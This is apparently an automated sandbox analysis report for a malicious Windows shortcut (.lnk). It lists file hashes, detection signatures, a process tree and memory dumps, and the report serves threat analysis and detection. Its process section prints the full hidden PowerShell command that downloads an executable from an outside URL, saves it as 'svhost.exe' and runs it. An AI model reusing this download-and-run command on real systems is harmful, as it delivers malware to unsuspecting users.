Resubmissions
03-02-2023 01:45
- 230203-b6fmlshg33 (score 10) 02-02-2023 21:18
- 230202-z5z7maba8z (score 10) 02-02-2023 21:02
- 230202-zvr39sah6z (score 10)

Analysis
- max time kernel: 1549s
- max time network: 1528s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02-02-2023 21:18
Static task: static1
Behavioral task: behavioral1
Sample: a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk
Resource: win10v2004-20221111-en
General
- Target: a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk
- Size: 2KB
- MD5: ef7f9739337bc657cd0a63e32e27d0a1
- SHA1: bf67555a7272f24ceb57b1c49e4cf37dc17b246f
- SHA256: a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c
- SHA512: e3d0a14ac1b9165e75e619aa6f76058a4c799bb722abaeafac977c35f31ab10ad8c8a51c7f3828bb896cbf339f971974a4fb26421ba6aea52530ac84b7785ada
Malware Config
- Extracted: https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes (flow / pid / process): 17 / 4808 / powershell.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description / ioc / process): Key value queried / \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation / cmd.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process): 4808 / powershell.exe; 4808 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process): Token: SeDebugPrivilege / 4808 / powershell.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Processes (description / pid / process / target process): PID 1788 wrote to memory of 4808 / 1788 / cmd.exe / powershell.exe; PID 1788 wrote to memory of 4808 / 1788 / cmd.exe / powershell.exe
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\a517abf69af75cef34cc2db14981ea42b2ef4424c140e37363f80badb2353c6c.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of [1])
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://oiartzunirratia.eus/install/clean/Lcovlccdxd.exe','C:\Users\Admin\AppData\Roaming\svhost.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\svhost.exe'
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/4808-132-0x0000000000000000-mapping.dmp
- memory/4808-133-0x0000024F6AB50000-0x0000024F6AB72000-memory.dmp (Filesize 136KB)
- memory/4808-134-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmp (Filesize 10.8MB)
- memory/4808-135-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmp (Filesize 10.8MB)
- memory/4808-136-0x00007FFD37DA0000-0x00007FFD38861000-memory.dmp (Filesize 10.8MB)